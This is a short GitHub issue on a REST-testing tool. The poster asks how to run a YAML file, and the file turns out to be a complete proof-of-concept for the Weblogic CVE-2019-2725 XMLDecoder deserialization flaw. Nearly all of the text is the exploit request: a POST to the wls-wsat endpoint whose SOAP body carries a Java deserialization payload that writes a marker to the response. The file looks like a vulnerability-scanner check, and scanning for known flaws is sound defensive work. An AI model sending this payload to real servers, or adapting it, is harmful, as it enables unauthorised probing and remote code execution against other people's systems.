### ISSUE TITLE
how run my yaml file, thanks

### ISSUE THREAD

**Issue by hktalent** [svanoort/pyresttest#311]
code
```
name: poc-yaml-weblogic-cve-2019-2725  # nolint[:namematch]
rules:
  - method: POST
    path: /wls-wsat/CoordinatorPortType
    headers:
      Content-Type: text/xml
    body: >-
      <?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"/><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void><void method="getWriter"><void method="write"><string/></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    follow_redirects: true
    expression: >
      response.body.bcontains(b"225773091")
detail:
  vulnpath: '/wls-wsat/CoordinatorPortType'
  author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166)
  description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData'
  weblogic_version: '>12'
  links:
    - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
    - https://github.com/QAX-A-Team/WeblogicEnvironment
    - https://xz.aliyun.com/t/5299
```
